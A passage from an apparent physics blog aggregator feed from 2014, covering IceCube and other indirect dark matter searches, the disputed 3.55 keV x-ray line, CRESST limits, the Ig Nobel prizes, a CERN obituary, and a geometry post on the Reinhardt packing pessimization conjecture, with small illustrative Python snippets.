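# Toy event selection illustrating IceCube's "Earth as shield" trick:
# keep only up-going tracks (zenith angle > 90 degrees), since only
# neutrinos can cross the whole Earth. The events are made up.

events = [
    {"id": 1, "zenith_deg": 35.0},   # down-going: likely an atmospheric muon
    {"id": 2, "zenith_deg": 120.0},  # up-going: must be a neutrino
    {"id": 3, "zenith_deg": 95.0},   # up-going
    {"id": 4, "zenith_deg": 80.0},   # down-going
]

def is_up_going(event):
    """True if the track points up through the detector (came via the Earth)."""
    return event["zenith_deg"] > 90.0

neutrino_candidates = [e["id"] for e in events if is_up_going(e)]
print("up-going candidates:", neutrino_candidates)  # -> [2, 3]
```

The real selection of course uses reconstructed track quality as well, but the zenith cut is the conceptual heart of it.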

Now that we’ve talked about the rationale of building gigantic detectors out of ice and the kinds of signals and backgrounds to expect in such detectors, let’s talk the actual design of the experiment. IceCube consists of 86 strings of 60 digital optical modules, each consisting of a photomultiplier tube and a readout board, deployed between 1.5 and 2.5 kilometers deep in the Antarctic ice. How do you get the modules down there? Only with the help of very powerful hot-water drills. The drilling of these holes and the construct­ion of IceCube is exciting enough that it probably warrants its own article.


Fig. 8: A schematic of the IceCube experiment.  Note the Eiffel Tower included for scale.  Image from [12].

Alongside the strings that make up the bulk of the detector, IceCube also contains a couple of other subdetectors. There is a detector called IceTop on the surface of the ice that is used to help veto events that are atmospheric in origin. There is another detector called DeepCore that consists of additional strings with optical modules packed much more tightly together than on the regular strings, for the purpose of increasing the sensitivity to low-energy events. Other special extensions designed to look for very high and very low energy events are also planned for the near future.

With regards to the quest for dark matter, the IceCube strategy is to focus on two different WIMP annihilation models: χχ to W+W- (or τ+τ- for WIMPs that are lighter than W bosons) and χχ to b b-bar. In each case, the annihilation products decay into secondary particles, including some neutrinos. By examining neutrinos both from the sun and from other galaxies and galaxy clusters, IceCube has produced a very competitive limit on the cross section for dark matter annihilation via these and other similar annihilation modes [13, 14].


Fig. 9: IceCube’s 2012  limit on dark matter – proton spin dependent interactions.  All of the black curves correspond to different neutrino models.  Image from [15].

For more information, there is a wonderful in-depth review of the IceCube detector design and status at the Annual Review of Nuclear and Particle Science.


So there you have it. These are some of the big projects keeping an eye out for WIMPs in the sky. At least some of these experiments have seen hints of something promising, so over the next couple of years maybe we’ll finally get that five-sigma discovery that we want so badly to see.



[1] AMS Collaboration. “High statistics measurement of the positron fraction in primary cosmic rays of 0.5-500 GeV with the Alpha Magnetic Spectrometer on the International Space Station.” Phys. Rev. Lett. 113 (2014) 121101.

[2] AMS Collaboration. “First result from the Alpha Magnetic Spectrometer on the International Space Station: Precision measurement of the positron fraction in primary cosmic rays of 0.5-350 GeV.” Phys. Rev. Lett. 110 (2013) 141102.

[3] Serpico, Pasquale D. “Astrophysical models for the origin of the positron ‘excess’.”  Astroparticle Physics, Vol. 39, pg. 2-11 (2011). ArXiv e-print 1108.4827.

[4] AMS Collaboration. “Electron and positron fluxes in primary cosmic rays measured with the Alpha Magnetic Spectrometer on the International Space Station.” Phys. Rev. Lett. 113 (2014) 121102.

[5] Fermi-LAT Collaboration.  “The large area telescope on the Fermi Gamma-Ray Space Telescope mission.” The Astrophysical Journal, Vol. 697, Issue 2, pp. 1071-1102 (2009). ArXiv e-print 0902.1089.

[6] Bloom, Elliott. “The search for dark matter with Fermi.” Conference presentation – Dark Matter 2014, Westwood, CA.

[7] Bringmann, Torsten, et al. “Fermi LAT search for internal bremsstrahlung signatures from dark matter annihilation.” JCAP 1207 (2012) 054. ArXiv e-print 1203.1312.

[8] Weniger, Christoph. “A tentative gamma-ray line from dark matter annihilation at the Fermi Large Area Telescope.” JCAP 1208 (2012) 007. ArXiv e-print 1204.2797.

[9] Albert, Andrea. “Search for gamma-ray spectral lines in the Milky Way diffuse with the Fermi Large Area Telescope.” Conference presentation – The Fermi Symposium 2012.

[10] Fermi-LAT Collaboration. “Search for gamma-ray spectral lines with the Fermi Large Area Telescope and dark matter implications.” Phys.Rev. D 88 (2013) 082002 . ArXiv e-print 1305.5597.

[11] Fermi-LAT Collaboration. “Dark matter constraints from observations of 25 Milky Way satellite galaxies with the Fermi Large Area Telescope.” Phys.Rev. D 89 (2014) 4, 042001. ArXiv e-print 1310.0828.

[12] IceCube Collaboration. “Measurement of South Pole ice transparency with the IceCube LED calibration system.” ArXiv e-print 1301.5361.

[13] IceCube Collaboration. “Search for dark matter annihilations in the Sun with the 79-string IceCube detector.” Phys. Rev. Lett. 110, 131302 (2013). ArXiv e-print 1212.4097v2.

[14] IceCube Collaboration. “IceCube search for dark matter annihilation in nearby galaxies and galaxy clusters.” Phys. Rev. D 88 (2013) 122001. ArXiv e-print 1307.3473v2.

[15] Arguelles, Carlos A., and Joachim Kopp. “Sterile neutrinos and indirect dark matter searches in IceCube.” JCAP 1207 (2012) 016. ArXiv e-print 1202.3431.

by Nicole Larsen at September 25, 2014 03:50 PM

arXiv blog

The Coming Era Of Self-Assembly Using Microfluidic Devices

Researchers are assessing the potential of an entirely new way to make exotic materials based on microfluidic self-assembly.

When it comes to building microscopic devices, one of the most promising ideas is to exploit the process of self-assembly. In this way, complex structures can be created by combining building blocks under natural circumstances.

September 25, 2014 02:20 PM

Jester - Resonaances

X-ray bananas
This year's discoveries follow the well-known 5-stage Kübler-Ross pattern: 1) announcement, 2) excitement, 3) debunking, 4) confusion, 5) depression.  While BICEP is approaching the end of the cycle, the sterile neutrino dark matter signal reported earlier this year is now entering stage 3. This is thanks to yesterday's paper entitled Dark matter searches going bananas by Tesla Jeltema and Stefano Profumo (to my surprise, this is not the first banana in a physics paper's title).

In the previous episode, two independent analyses using public data from the XMM and Chandra satellites found an anomalous 3.55 keV monochromatic emission line from galactic clusters and Andromeda. One possible interpretation is a 7.1 keV sterile neutrino dark matter decaying to a photon and a standard neutrino. If the signal could be confirmed and conventional explanations (via known atomic emission lines) could be excluded, it would mean we are close to solving the dark matter puzzle.

It seems this is not gonna happen. The new paper makes two claims:

  1. Limits from x-ray observations of the Milky Way center exclude the sterile neutrino interpretation of the reported signal from galactic clusters. 
  2. In any case, there's no significant anomalous emission line from galactic clusters near 3.55 keV.       

Let's begin with the first claim. The authors analyze several days of XMM observations of the Milky Way center. They find that the observed spectrum can be very well fit by known plasma emission lines. In particular, all spectral features near 3.5 keV are accounted for if Potassium XVIII lines at 3.48 and 3.52 keV are included in the fit. Based on that agreement, they can derive strong bounds on the parameters of the sterile neutrino dark matter model: the mixing angle between the sterile and the standard neutrino should satisfy sin^2(2θ) ≤ 2*10^-11. This excludes the parameter space favored by the previous detection of the 3.55 keV line in galactic clusters. The conclusions are similar to, and even somewhat stronger than, those of the earlier analysis using Chandra data.
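For orientation, the standard radiative decay rate of a sterile neutrino (the Pal-Wolfenstein result) shows why an x-ray flux limit translates directly into a bound on the mixing angle: the width scales linearly with sin^2(2θ) and steeply with the mass, and the photon is monochromatic at half the sterile neutrino mass:

$$\Gamma(\nu_s \to \nu\gamma) \;=\; \frac{9\,\alpha\, G_F^2}{1024\,\pi^4}\,\sin^2(2\theta)\, m_s^5, \qquad E_\gamma = \frac{m_s}{2} = 3.55\ \mathrm{keV}\ \ \text{for}\ m_s = 7.1\ \mathrm{keV}.$$

So for a fixed mass, the expected line flux from a given dark matter column is simply proportional to sin^2(2θ), and a non-observation caps the mixing angle.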

This is disappointing but not a disaster yet, as there are alternative dark matter models (e.g. axions converting to photons in the magnetic field of a galaxy) that do not predict observable emission lines from our galaxy. But there's one important corollary of the new analysis. It seems that the inferred strength of the Potassium XVIII lines compared to the strength of other atomic lines does not agree well with theoretical models of plasma emission. Such models were an important ingredient in the previous analyses that found the signal. In particular, the original 3.55 keV detection paper assumed upper limits on the strength of the Potassium XVIII line derived from the observed strength of the Sulfur XVI line. But the new findings suggest that systematic errors may have been underestimated. Allowing for a higher flux of Potassium XVIII, and also including the 3.51 keV Chlorine XVII line (which was missed in the previous analyses), one can obtain a good fit to the observed x-ray spectrum from galactic clusters, without introducing a dark matter emission line. Right... we suspected something was smelling bad here, and now we know it was chlorine... Finally, the new paper reanalyses the x-ray spectrum from Andromeda and disagrees with the previous findings: there's a hint of the 3.53 keV anomalous emission line from Andromeda, but its significance is merely 1 sigma.

So, the putative dark matter signals are dropping like flies these days. We urgently need new ones to replenish my graph ;)

Note added: While finalizing this post I became aware of today's paper that, using the same data, DOES find a 3.55 keV line from the Milky Way center.  So we're already at stage 4... it seems that the devil is in the details of how you model the potassium lines (which, frankly speaking, is not reassuring).

by Jester ( at September 25, 2014 02:12 PM

Jester - Resonaances

Weekend Plot: Prodigal CRESST
CRESST is one of the dark matter direct detection experiments seeing an excess which may be interpreted as a signal of a fairly light (order 10 GeV) dark matter particle.  Or it was... This week they posted a new paper reporting on new data collected last year with an upgraded detector. Farewell CRESST signal, welcome CRESST limits:
The new limits (red line) exclude most of the region of the parameter space favored by the previous CRESST excess: M1 and M2 in the plot.  Of course, these regions have never been taken at face value because they are excluded by orders of magnitude by the LUX, Xenon, and CDMS experiments. Nevertheless, the excess was pointing to a similar dark matter mass as the signals reported by DAMA, CoGeNT, and CDMS-Si (other color stains), which prompted many to speculate about a common origin of all these anomalies. Now the excess is gone. Instead, CRESST emerges as an interesting player in the race toward the neutrino wall. Their target material - CaWO4 crystals - contains oxygen nuclei which, due to their small masses, are well suited for detecting light dark matter. The kink in the limits curve near 5 GeV is the point below which dark-matter-induced recoil events would be dominated by scattering on oxygen. Currently, CRESST has the world's best limits for dark matter masses between 2 and 3 GeV, beating DAMIC (not shown in the plot) and CDMSlite (dashed green line).
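The kinematics behind that kink can be checked in a few lines. For elastic scattering, the maximum recoil energy is E_R^max = 2 μ² v² / m_N, with μ the WIMP-nucleus reduced mass, so a light nucleus like oxygen absorbs far more energy from a ~3 GeV WIMP than a heavy one like tungsten. A back-of-the-envelope sketch (the dark matter speed is a rough galactic-scale value, not a CRESST parameter):

```python
# Why light nuclei help for light dark matter (back-of-the-envelope):
# maximum recoil energy in elastic scattering is
#   E_R_max = 2 * mu^2 * v^2 / m_N,  mu = m_chi * m_N / (m_chi + m_N),
# so for m_chi << m_N the energy transfer scales roughly as 1/m_N.

AMU_GEV = 0.9315   # atomic mass unit in GeV
V_MAX = 2.5e-3     # rough galactic-escape-scale DM speed, in units of c

def max_recoil_kev(m_chi_gev, a_nucleus):
    """Maximum nuclear recoil energy, in keV, for a WIMP of mass m_chi."""
    m_n = a_nucleus * AMU_GEV
    mu = m_chi_gev * m_n / (m_chi_gev + m_n)
    return 2.0 * mu**2 * V_MAX**2 / m_n * 1e6  # GeV -> keV

# Compare the three nuclei in CaWO4 for a 3 GeV WIMP:
for name, a in (("oxygen", 16), ("calcium", 40), ("tungsten", 184)):
    print(f"{name:8s} A={a:3d}: E_R_max ~ {max_recoil_kev(3.0, a):.2f} keV")
```

Oxygen recoils land several keV above where tungsten recoils do, which is why a light-WIMP search in CaWO4 is effectively an oxygen experiment below a few GeV.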

by Jester ( at September 25, 2014 02:11 PM

CERN Bulletin

CERN Bulletin Issue No. 39-40/2014
Link to e-Bulletin Issue No. 39-40/2014. Link to all articles in this issue.

September 25, 2014 09:06 AM

September 24, 2014

ZapperZ - Physics and Physicists

2014 Ig Nobel Prize
As usual at this time of the year, the Ig Nobel Prizes have been awarded to a group of really serious but fun/useless/trivial/etc. work. The award for physics this year is for a study of how slippery a banana peel really is.

Physics: A Japanese team has finally tested whether, indeed, banana skins are really as slippery as slapstick comedy would have us believe. In “Frictional Coefficient under Banana Skin,” they show a banana skin reduces the friction between a shoe sole and the floor by about a fifth. 

But what caught my eye was the award given for Neuroscience, which I don't think is that trivial or useless.

Neuroscience: In “Seeing Jesus in Toast,” a team from China and Canada have clinched the neuroscience prize with an exploration of a phenomenon called face pareidolia, in which people see nonexistent faces. First, they tricked participants into thinking that a nonsense image had a face or letter hidden in it. Then, they carefully monitored brain activity in the participants they managed to convince, to understand which parts of our minds are to blame.

This is, actually, quite important in arguing against people who rely on "seeing" with their eyes as a primary source of evidence, which is often part of anecdotal evidence.

I argued before on why our eyes are really not reliable detectors. That post came about because I've often been questioned about the validity of the existence of the electron simply because we haven't "seen" it with our eyes. I put forth a few facts on why our eyes are really a rather bad standard to use in detecting anything, simply due to the limitations they have on a number of properties.

This paper about seeing Jesus in toast is another solid point to add to those arguments about us "seeing" something. It adds to the fact that we do not just see something, but also PROCESS the optical signal from our eyes via our brain. Our brain, due to either conditioning, evolution, etc., has added these filters, pattern recognition, etc. to help us interpret what we are seeing. And it is because of that that we have the potential to see something that isn't really there. This work clearly proves that!

It is another reason why "seeing" with our eyes may not always be reliable evidence.


by ZapperZ ( at September 24, 2014 04:26 PM

CERN Bulletin

Hervé Genoud (1982-2014)

On Monday 22 September, early in the morning, we received with enormous sadness the message that Hervé Genoud had passed away after an eight-month battle with leukaemia, at the age of just 32.


“Hervé s’est envolé vers la lumière,” wrote Mélissa, his wife, in her message. He sadly leaves behind his wife Mélissa and his two young children Maxence and Nathanaël.

Hervé joined the BE-OP group as operator on the PS in June 2006 where he quickly integrated and became a core member of the operations team. He did not limit his work to the PS, but was also very much appreciated for his roles in the LHC quench protection system and his outreach activities, such as the CERN open days and La nuit des chercheurs.

With this loss we not only lose a colleague, but also, for many, a good friend. We will never forget his enthusiasm, his jokes and his very positive approach, not only in his work, but also during his battle against his illness. When he felt able he regularly kept his direct colleagues and friends updated on his situation and used to sign his messages with “Hervé, Chasseur de Globules Blancs Merdique dans l'escadron Cortisone-Chimio”, showing his determination to fight his disease while never losing his sense of humor.

We wish Mélissa, his children and family all the necessary strength to overcome this loss.

His friends and colleagues

We deeply regret to announce the death of Hervé Genoud on 22 September 2014.

Hervé Genoud, who was born on 6 April 1982, worked in the BE Department and had been at CERN since 1 September 2003.

The Director-General has sent a message of condolence to his family on behalf of the CERN personnel.

Social Affairs
Human Resources Department

September 24, 2014 04:09 PM

ZapperZ - Physics and Physicists

Teleportation to a Solid-State Quantum Memory
The Gisin group has done it again! This time, they have managed to teleport a quantum state via photons into a quantum memory in the form of a doped crystal.

Today, Felix Bussières at the University of Geneva in Switzerland and a few pals say they’ve taken an important step towards this. These guys have teleported quantum information to a crystal doped with rare-earth ions—a kind of quantum memory. But crucially they’ve done it for the first time over the kind of ordinary optical fiber that telecommunications networks use all over the world.

This work has been published in Nature Photonics.


by ZapperZ ( at September 24, 2014 03:57 PM

September 23, 2014

The n-Category Cafe

A Packing Pessimization Problem

In a pessimization problem, you try to minimize the maximum value of some function:

$$ \min_x \max_y f(x,y) $$

For example: which convex body in Euclidean space is the worst for packing? That is, which has the smallest maximum packing density?

(In case you’re wondering, we restrict attention to convex bodies because without this restriction the maximum packing density can be made as close to 0 as we want.)
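As a toy illustration of the min-max (my own sketch, not from the post), one can discretize $x$ and $y$ and compute the pessimal value on a grid:

```python
# Toy pessimization problem: approximate min_x max_y f(x, y) on a grid.
# (A hypothetical illustration of the general notion, not the packing
# problem itself.)

def pessimize(f, xs, ys):
    """Return min over x of (max over y) of f(x, y) on the given grids."""
    return min(max(f(x, y) for y in ys) for x in xs)

# Example: f(x, y) = (x - y)**2 on [0, 1] x [0, 1].
# For fixed x the adversarial y is the farther endpoint, so the best
# choice is x = 0.5, giving the value 0.25.
xs = [i / 100 for i in range(101)]
ys = [j / 100 for j in range(101)]
value = pessimize(lambda x, y: (x - y) ** 2, xs, ys)
print(value)  # 0.25
```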

Of course the answer depends on the dimension. According to Martin Gardner, Stanislaw Ulam guessed that in 3 dimensions, the worst is the round ball. This is called Ulam’s packing conjecture.

In 3 dimensions, congruent balls can be packed with a density of

$$ \frac{\pi}{\sqrt{18}} = 0.74048048 \dots $$

and Kepler’s conjecture, now a theorem, says that’s their maximum packing density. So, Ulam’s packing conjecture says we can pack congruent copies of any other convex body in $\mathbb{R}^3$ with a density above $\pi/\sqrt{18}$.

Ulam’s packing conjecture is still open. We know that the ball is a local pessimum for ‘centrally symmetric’ convex bodies in 3 dimensions. But that’s just a small first step.

Geometry is often easier in 2 dimensions… but in some ways, the packing pessimization problem for convex bodies in 2 dimensions is even more mysterious than in 3.

You see, in 2 dimensions the disk is not the worst. The disk has maximum packing density of

$$ \frac{\pi}{\sqrt{12}} = 0.9068996 \dots $$

However, the densest packing of regular octagons has density

$$ \frac{4 + 4\sqrt{2}}{5 + 4\sqrt{2}} = 0.9061636 \dots $$

This is a tiny bit less! So, the obvious 2-dimensional analogue of Ulam’s packing conjecture is false.
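The two numbers are easy to compare numerically (a quick check of the values quoted above, not code from the post):

```python
import math

# Maximum packing density of congruent disks in the plane
disk = math.pi / math.sqrt(12)

# Densest (lattice) packing of regular octagons
octagon = (4 + 4 * math.sqrt(2)) / (5 + 4 * math.sqrt(2))

print(f"disk:    {disk:.7f}")
print(f"octagon: {octagon:.7f}")
print(octagon < disk)  # True: the octagon packs slightly worse
```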

By the way, the densest packing of regular octagons is not the one with square symmetry:

It’s this:

which is closer in spirit to the densest packing of discs:

The regular octagon is not the worst convex shape for packing the plane! Regular heptagons might be even worse. As far as I know, the densest known packing of regular heptagons is this ‘double lattice’ packing:

studied by Greg Kuperberg and his father. They showed this was the densest packing of regular heptagons where they are arranged in two lattices, each consisting of translates of a given heptagon. And this packing has density

$$ \frac{2}{97}\left(-111 + 492 \cos\left(\frac{\pi}{7}\right) - 356 \cos^2\left(\frac{\pi}{7}\right)\right) = 0.89269 \dots $$

But I don’t know if this is the densest possible packing of regular heptagons.
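As a sanity check on the number quoted above (my own quick evaluation, not from the post):

```python
import math

# Density of the Kuperbergs' double-lattice packing of regular
# heptagons, evaluated from the closed form quoted above.
c = math.cos(math.pi / 7)
heptagon = (2 / 97) * (-111 + 492 * c - 356 * c * c)
print(f"{heptagon:.5f}")  # 0.89269
```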

Unlike the heptagon, the regular octagon is centrally symmetric: if we put its center at the origin, a point $x$ is in the region iff $-x$ is in the region.

The great thing about convex centrally symmetric regions of the plane is that their densest packing is always a lattice packing: you take your region $R$ and form a packing by using all its translates $R + L$, where $L \subseteq \mathbb{R}^2$ is a lattice. This is an old result of László Fejes Tóth and C. A. Rogers. For convex centrally symmetric regions, it reduces the search for the densest packing to a finite-dimensional maximization problem!

I said the regular octagon wasn’t the worst convex shape for densely tiling the plane. Then I said the regular heptagon might be worse, but I didn’t know. So what’s worse?

A certain smoothed octagon is worse:

Since it’s centrally symmetric, we know its densest packing is a lattice packing, so it’s not miraculous that someone was able to work out its density:

$$ \frac{8 - 4\sqrt{2} - \ln 2}{2\sqrt{2} - 1} = 0.902414 \dots $$
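That closed form is likewise easy to evaluate (a quick numerical check, not part of the post):

```python
import math

# Maximum packing density of the smoothed octagon, from the
# closed form quoted above.
smoothed = (8 - 4 * math.sqrt(2) - math.log(2)) / (2 * math.sqrt(2) - 1)
print(f"{smoothed:.6f}")  # 0.902414
```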

and the way it looks:

In fact this shape is believed to be the worst centrally symmetric convex region for densely packing the plane! I don’t really know why. But Thomas Hales, who proved the Kepler conjecture, has an NSF grant based on a proposal where he says he’ll prove this:

In 1934, Reinhardt considered the problem of determining the shape of the centrally symmetric convex disk in the plane whose densest packing has the lowest density. In informal terms, if a contract requires a miser to make payment with a tray of identical gold coins filling the tray as densely as possible, and if the contract stipulates the coins to be convex and centrally symmetric, then what shape of coin should the miser choose in order to part with as little gold as possible? Reinhardt conjectured that the shape of the coin should be a smoothed octagon. The smoothed octagon is constructed by taking a regular octagon and clipping the corners with hyperbolic arcs. The density of the smoothed octagon is approximately 90 per cent. Work by previous researchers on this conjecture has tended to focus on special cases. Research of the PI gives a general analysis of the problem. It introduces a variational problem on the special linear group in two variables that captures the structure of the Reinhardt conjecture. An interesting feature of this problem is that the conjectured solution is not analytic, but only satisfies a Lipschitz condition. A second noteworthy feature of this problem is the presence of a nonlinear optimization problem in a finite number of variables, relating smoothed polygons to the conjecturally optimal smoothed octagon. The PI has previously completed many calculations related to the proof of the Reinhardt conjecture and proposes to complete the proof of the Reinhardt conjecture.

This research will solve a conjecture made in 1934 by Reinhardt about the convex shape in the plane whose optimal packing density is as small as possible. The significance of this proposal is found in its broader context. Here, three important fields of mathematical inquiry are brought to bear on a single problem: discrete geometry, nonsmooth variational analysis, and global nonlinear optimization. Problems concerning packings and density lie at the heart of discrete geometry and are closely connected with problems of the same nature that routinely arise in materials science. Variational problems, and more generally control theory, have become indispensable tools in many disciplines, ranging from mathematical finance to robotic control. However, research that gives an exact nonsmooth solution is relatively rare, and this feature gives this project special interest among variational problems. This research is also expected to further develop methods that use computers to obtain exact global solutions to nonlinear optimization problems. Applications of nonlinear optimization are abundant throughout science and arise naturally whenever a best choice is sought among a system with finitely many parameters. Methods that use computers to find exact solutions thus have the potential of finding widespread use. Thus, by studying this particular packing problem, mathematical tools may be further developed with promising prospects of broad application throughout the sciences.

I don’t have the know-how to guess what Hales will do. I haven’t even read the proof of that theorem by László Fejes Tóth and C. A. Rogers! It seems like a miracle to me.

But here are some interesting things that it implies.

Let’s say a region is a relatively compact open set. Just for now, let’s say a shape is a nonempty convex centrally symmetric region in the plane, centered at the origin. Let $Shapes$ be the set of shapes. Let $Lattices$ be the set of lattices in the plane, where a lattice is a discrete subgroup isomorphic to $\mathbb{Z}^2$.

We can define a function

$$ density \colon Shapes \times Lattices \to [0,1] $$

as follows. For each shape $S \in Shapes$ and lattice $L \in Lattices$, if we rescale $S$ by a sufficiently small constant $\alpha$, the resulting shape $\alpha S$ will have the property that the regions $\alpha S + \ell$ are disjoint as $\ell$ ranges over $L \subseteq \mathbb{R}^2$. So, for small enough $\alpha$, $\alpha S + L$ will be a way of packing the plane by rescaled copies of $S$. We can take the supremum of the density of $\alpha S + L$ over such $\alpha$, and call it

$$ density(S,L) $$

Thanks to the theorem of László Fejes Tóth and C. A. Rogers, the maximum packing density of the shape $S$ is

$$ \sup_{L \in Lattices} density(S,L) $$

Here I’m taking advantage of the obvious fact that the maximum packing density of $S$ equals that of any rescaled version $\alpha S$. And in using the word ‘maximum’, I’m also taking for granted that the supremum is actually attained.
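To make the construction concrete, here is a minimal sketch (my own illustration, under the simplifying assumption that $S$ is a disk) of $density(S,L)$: the optimal rescaling grows the disk until its lattice translates just touch, i.e. its radius is half the length of the shortest nonzero lattice vector.

```python
import math

# density(S, L) specialized to S = disk: scale the disk until its
# translates by the lattice just touch (radius = half the shortest
# nonzero lattice vector), then take area / covolume.
# A sketch under that simplifying assumption, not code from the post.

def shortest_vector_length(b1, b2, n=5):
    """Brute-force length of the shortest nonzero lattice vector
    (searching a small window of coefficients, enough for these bases)."""
    best = float("inf")
    for i in range(-n, n + 1):
        for j in range(-n, n + 1):
            if (i, j) == (0, 0):
                continue
            x = i * b1[0] + j * b2[0]
            y = i * b1[1] + j * b2[1]
            best = min(best, math.hypot(x, y))
    return best

def disk_packing_density(b1, b2):
    r = shortest_vector_length(b1, b2) / 2   # largest non-overlapping radius
    covolume = abs(b1[0] * b2[1] - b1[1] * b2[0])
    return math.pi * r * r / covolume

# Square lattice gives pi/4 = 0.785...; the hexagonal lattice gives
# pi/sqrt(12) = 0.906...
print(disk_packing_density((1, 0), (0, 1)))
print(disk_packing_density((1, 0), (0.5, math.sqrt(3) / 2)))
```

The hexagonal lattice attains the supremum $\pi/\sqrt{12}$ over all lattices, matching the disk density quoted earlier.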

Given all this, the pessimization problem for packing centrally symmetric convex regions is all about finding

$$ \inf_{S \in Shapes} \; \sup_{L \in Lattices} density(S,L) $$

But there’s more nice symmetry at work here. Linear transformations of the plane act on shapes, and lattices, and packings… and the concept of density is invariant under linear transformations!

One thing this instantly implies is that the maximum packing density for a centrally symmetric convex region doesn’t change if we apply a linear transformation to that region.

This is quite surprising. You might think that stretching or shearing a region could give a radically new way to pack it as densely as possible. And indeed that’s probably true in general. But for centrally symmetric convex regions, the densest packings are all lattice packings. So if we stretch or shear the region, we can just stretch or shear the lattice packing that works best, and get the lattice packing that works best for the stretched or sheared region. The packing density is unchanged!
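The invariance can be checked numerically for lattice packings, where the density of one copy of $S$ per fundamental cell is simply area divided by covolume (a hypothetical sketch for a disk and the hexagonal lattice, not code from the post):

```python
import math
import random

# Numerical check of GL(2,R)-invariance for lattice packings: with one
# copy of S per fundamental cell, the packing density is
# area(S) / covolume(L).  A linear map g multiplies both quantities by
# |det g|, so the density is unchanged.
# Hypothetical sketch: S = disk of radius 1/2, L = hexagonal lattice,
# so the disks just touch and the density is pi/sqrt(12).

def det2(u, v):
    """Determinant of the 2x2 matrix with rows u and v."""
    return u[0] * v[1] - u[1] * v[0]

def apply_map(g, v):
    """Apply the 2x2 matrix g (a list of rows) to the vector v."""
    return (g[0][0] * v[0] + g[0][1] * v[1],
            g[1][0] * v[0] + g[1][1] * v[1])

def lattice_density(area, b1, b2):
    """Density of one copy of a shape with the given area per cell."""
    return area / abs(det2(b1, b2))

random.seed(0)
b1, b2 = (1.0, 0.0), (0.5, math.sqrt(3) / 2)   # hexagonal lattice basis
area = math.pi / 4                              # disk of radius 1/2

before = lattice_density(area, b1, b2)          # pi/sqrt(12)
for _ in range(5):
    g = [[random.uniform(-2, 2) for _ in range(2)] for _ in range(2)]
    detg = abs(det2(g[0], g[1]))
    # g sends the disk to an ellipse of area |det g| * area, and the
    # lattice basis to g(b1), g(b2)
    after = lattice_density(detg * area, apply_map(g, b1), apply_map(g, b2))
    assert abs(after - before) < 1e-6
print("density unchanged under 5 random linear maps")
```

The cancellation is exact: a linear map $g$ scales both the area of the shape and the covolume of the lattice by $|\det g|$.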

We can say this using jargon. The group of linear transformations of the plane is $GL(2, \mathbb{R})$. This acts on $Shapes$ and $Lattices$, and for any $g \in GL(2, \mathbb{R})$ we have

$$ density(g S, g L) = density(S,L) $$

So, the function

$$ density \colon Shapes \times Lattices \to [0,1] $$

is $GL(2,\mathbb{R})$-invariant. And thus, the maximum packing density is invariant:

$$ \sup_{L \in Lattices} density(S,L) = \sup_{L \in Lattices} density(g S,L) $$

for all $g \in GL(2,\mathbb{R})$.

As mentioned before, we also have

$$ density(\alpha S, L) = density(S, L) $$

where $\alpha$ is any nonzero scalar multiple of the identity matrix (and thus a rescaling if $\alpha > 0$). So, we can replace $Shapes$ by the quotient space $Shapes/\mathbb{R}^*$, and work with

$$ density \colon Shapes/\mathbb{R}^* \times Lattices \to [0,1] $$

$GL(2,\mathbb{R})$ still acts on the first factor here, with scalar multiples of the identity acting trivially, and this map is still $GL(2,\mathbb{R})$-invariant.

I think there should be a topology on $Shapes$ that makes the quotient space $Shapes/\mathbb{R}^*$ compact and makes

$$ density \colon Shapes \times Lattices \to [0,1] $$

continuous. Something like the Hausdorff metric, maybe. Can anyone help me here?

None of this goes far in solving the packing pessimization problem for convex centrally symmetric regions in the plane. We’ve reduced the number of degrees of freedom, but they’re still infinite.

But still, it’s fun. I like how it’s vaguely reminiscent of the theory of modular functions, which can be seen as $SL(2,\mathbb{R})$-invariant functions of a lattice together with an ellipse centered at the origin.

References and Addenda

For more on packing pessimization problems, see:

To see who drew the pretty pictures, click on the pictures.

There’s a lot of good stuff in the comments. Most notably:

• The set $Shapes/GL(2,\mathbb{R})$ has a nice topology making it a compact space. This is the moduli space of 2-dimensional real Banach spaces! In general, the moduli space of $n$-dimensional real Banach spaces is called a Banach–Mazur compactum; click the link for details on its topology.

• Amazingly, there is a one-parameter family of maximally dense packings of the smoothed octagon! Greg Egan has made a movie showing all these packings:

As the smoothed octagons turn, their centers move but the area in each space between them stays the same!

by john ( at September 23, 2014 10:39 PM

arXiv blog

Human Contact Patterns in High Schools Hint at Epidemic Containment Strategies

The first study of contact patterns between high school students suggests new ways to halt the spread of disease.

September 23, 2014 02:27 PM

Symmetrybreaking - Fermilab/SLAC

When research worlds collide

Particle physicists and scientists from other disciplines are finding ways to help one another answer critical questions.

When particle physics and other fields of science meet, interesting things happen. Cosmic rays are put to use studying cloud formation. A particle detector tackles questions about aircraft engineering. Invisible particles offer clues about the interior of the Earth.

All researchers are trying to understand how the world works; they just go about it in different ways. Through interdisciplinary projects, scientists from different backgrounds can offer one another new technology, techniques and perspectives.

Researchers Jasper Kirkby of CERN, Anton Tremsin of the University of California, Berkeley, and Bill McDonough of the University of Maryland have all reached out to forge unique connections with other researchers, pursuing diverse goals with tools from particle physics.

Understanding climate with cosmic rays

Jasper Kirkby is an experimental particle physicist who’s worked on several big accelerator experiments at SLAC National Accelerator Laboratory and CERN since 1972.

Nearly 20 years ago, he heard a talk about cosmic rays and cloud formation. Cloud formation is a key component of climate models because clouds scatter sunlight, providing a cooling effect in the atmosphere. As Kirkby learned at the talk, cloud formation seemed to correlate with the appearance of cosmic rays, high-energy particles—mostly protons—that rain on the Earth from space.

Clouds form when water condenses around aerosol particles, tiny liquid or solid particles suspended in the air. It was speculated that cosmic rays ionizing atmospheric vapors could help these cloud seeds to form. However, both aerosol particle formation and atmospheric vapors are poorly understood.

After the talk, Kirkby wrote a paper about how this process could be investigated under controlled conditions in the laboratory using an ultra-clean atmospheric chamber and a proton beam to simulate the cosmic rays. He called the proposed chamber CLOUD, for Cosmics Leaving Outdoor Droplets. Kirkby then went on a roadshow around Europe to discuss his ideas with the atmospheric community, starting at University of Berne in May 1998.

“With interdisciplinary ideas, you really stick your neck out,” Kirkby says. “And I did not want to do this unless the atmospheric community thought it was a good idea.”

Kirkby picked up collaborators along the way and formed what he calls a “dream team” for the CLOUD experiment. “There is a mixing of scientific cultures and techniques that can be very powerful,” Kirkby says. “No one person has all the answers, but each individual brings in novel ideas and expertise.”

Members of Kirkby’s team are able to introduce trace amounts of different vapors at the part-per-trillion level into the CLOUD chamber. They use measurements of the actual atmosphere to determine which mixtures to test. “We can isolate precisely what vapors are important and quantify how they interact under different conditions,” Kirkby says, “but we need the field measurements to narrow down the choices.”

